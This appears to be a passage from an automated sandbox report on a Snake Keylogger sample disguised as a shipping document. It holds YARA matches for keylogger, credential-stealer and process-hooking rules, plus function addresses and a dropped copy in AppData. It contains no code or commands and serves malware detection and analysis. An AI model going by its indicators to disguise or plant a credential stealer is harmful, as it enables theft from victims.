                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 0_2_01383E400_2_01383E40
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 0_2_01386F900_2_01386F90
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 0_2_0138DA7C0_2_0138DA7C
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 0_2_073444310_2_07344431
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4F0079_2_00E4F007
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4C1909_2_00E4C190
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E461089_2_00E46108
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4B3289_2_00E4B328
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4C4709_2_00E4C470
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4C7519_2_00E4C751
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E467309_2_00E46730
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E498589_2_00E49858
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E44AD99_2_00E44AD9
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4CA319_2_00E4CA31
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4BBD29_2_00E4BBD2
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4BEB09_2_00E4BEB0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E435709_2_00E43570
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4E5289_2_00E4E528
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_00E4E5179_2_00E4E517
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050984609_2_05098460
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050911C09_2_050911C0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050900409_2_05090040
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050938709_2_05093870
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_05097B709_2_05097B70
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_05090D519_2_05090D51
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509ED509_2_0509ED50
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_05090D609_2_05090D60
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509ED609_2_0509ED60
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509BD889_2_0509BD88
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509BD989_2_0509BD98
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_05097D909_2_05097D90
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509DC009_2_0509DC00
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050904909_2_05090490
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050904A09_2_050904A0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509E4A09_2_0509E4A0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509E4B09_2_0509E4B0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509B4D79_2_0509B4D7
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509B4E89_2_0509B4E8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509D7989_2_0509D798
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509D7A89_2_0509D7A8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509F6009_2_0509F600
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509F6109_2_0509F610
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509C6389_2_0509C638
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509C6489_2_0509C648
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509CEEA9_2_0509CEEA
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509CEF89_2_0509CEF8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509E9089_2_0509E908
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050909009_2_05090900
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509B9309_2_0509B930
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509B9409_2_0509B940
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509F1A99_2_0509F1A9
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509F1B89_2_0509F1B8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050911B09_2_050911B0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509C1E09_2_0509C1E0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509C1F09_2_0509C1F0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050900079_2_05090007
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509E0499_2_0509E049
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509E0589_2_0509E058
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050938609_2_05093860
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509E8F89_2_0509E8F8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050908F09_2_050908F0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509D3409_2_0509D340
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509D3509_2_0509D350
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050973D89_2_050973D8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_050973E89_2_050973E8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509DBF19_2_0509DBF1
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509FA599_2_0509FA59
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509FA689_2_0509FA68
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509CA909_2_0509CA90
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_0509CAA09_2_0509CAA0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_02AB3E4010_2_02AB3E40
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_02AB6F9010_2_02AB6F90
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_02ABDA7C10_2_02ABDA7C
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0517217110_2_05172171
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0517051810_2_05170518
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0517050910_2_05170509
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0701C6D810_2_0701C6D8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0701C2A010_2_0701C2A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0701DF2810_2_0701DF28
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0701ECD010_2_0701ECD0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0701ECE010_2_0701ECE0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 10_2_0701CB2010_2_0701CB20
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4B32814_2_02B4B328
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4F00714_2_02B4F007
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4C19014_2_02B4C190
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4610814_2_02B46108
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4C75214_2_02B4C752
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4C47014_2_02B4C470
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B44AD914_2_02B44AD9
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4CA3214_2_02B4CA32
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4BBD214_2_02B4BBD2
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4688014_2_02B46880
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4985814_2_02B49858
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4BEB014_2_02B4BEB0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4B4F214_2_02B4B4F2
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4E52814_2_02B4E528
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4E51714_2_02B4E517
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_02B4357214_2_02B43572
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B7D9014_2_057B7D90
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B387014_2_057B3870
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B846014_2_057B8460
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B0D6014_2_057B0D60
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BED6014_2_057BED60
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B0D5114_2_057B0D51
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BED5014_2_057BED50
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BB94014_2_057BB940
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BB93014_2_057BB930
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BE90814_2_057BE908
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B090014_2_057B0900
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BC1F014_2_057BC1F0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BC1E014_2_057BC1E0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B11C014_2_057B11C0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BF1B814_2_057BF1B8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B11B014_2_057B11B0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BF1A914_2_057BF1A9
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BBD9814_2_057BBD98
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BBD8814_2_057BBD88
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B386014_2_057B3860
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BE05814_2_057BE058
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BE04914_2_057BE049
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B004014_2_057B0040
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B003914_2_057B0039
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BDC0014_2_057BDC00
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BE8F814_2_057BE8F8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B08F014_2_057B08F0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BB4E814_2_057BB4E8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BB4D714_2_057BB4D7
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BE4B014_2_057BE4B0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B04A014_2_057B04A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BE4A014_2_057BE4A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B049014_2_057B0490
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BD35014_2_057BD350
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BD34014_2_057BD340
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BDBF114_2_057BDBF1
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057B73E814_2_057B73E8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BD7A814_2_057BD7A8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BD79814_2_057BD798
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BFA6814_2_057BFA68
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BFA5914_2_057BFA59
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BC64814_2_057BC648
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BC63814_2_057BC638
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BF61014_2_057BF610
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BF60014_2_057BF600
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BCEF814_2_057BCEF8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BCEEA14_2_057BCEEA
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_057BCAA014_2_057BCAA0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699B6E814_2_0699B6E8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699860814_2_06998608
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699AA5814_2_0699AA58
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699D67014_2_0699D670
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699C38814_2_0699C388
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06998BF214_2_06998BF2
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699B0A014_2_0699B0A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699A40814_2_0699A408
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699D02814_2_0699D028
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069911A014_2_069911A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699C9D814_2_0699C9D8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699BD3814_2_0699BD38
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699F29214_2_0699F292
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06995EB814_2_06995EB8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699F2A014_2_0699F2A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699B6D914_2_0699B6D9
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06995EC814_2_06995EC8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699561814_2_06995618
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699560A14_2_0699560A
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699860214_2_06998602
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699AA4814_2_0699AA48
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06995A7014_2_06995A70
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06995A6014_2_06995A60
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699D66314_2_0699D663
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069933B814_2_069933B8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069933A814_2_069933A8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06996BD014_2_06996BD0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06996BC114_2_06996BC1
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699A3F814_2_0699A3F8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699631214_2_06996312
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699373014_2_06993730
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699632014_2_06996320
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699677814_2_06996778
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699C37814_2_0699C378
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699676A14_2_0699676A
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699049814_2_06990498
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699749714_2_06997497
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699048814_2_06990488
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699B08F14_2_0699B08F
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069974A814_2_069974A8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069978F014_2_069978F0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069908F014_2_069908F0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069908E014_2_069908E0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699281814_2_06992818
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699D01814_2_0699D018
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699280714_2_06992807
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699000614_2_06990006
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699443014_2_06994430
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699705014_2_06997050
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699704914_2_06997049
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699004014_2_06990040
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699519814_2_06995198
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699119114_2_06991191
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699518E14_2_0699518E
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069981B014_2_069981B0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_069981A014_2_069981A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699C9C814_2_0699C9C8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699790014_2_06997900
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06990D3914_2_06990D39
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_0699BD2814_2_0699BD28
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06997D5814_2_06997D58
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06990D4814_2_06990D48
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 14_2_06997D4814_2_06997D48
                Source: HBL NO C-ACC-250002.exe, 00000000.00000000.2048135331.0000000000962000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesPTL.exe2 vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2094250259.00000000054F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2090620842.0000000000E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2094914013.0000000006FC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUI vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002D9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs HBL NO C-ACC-250002.exe
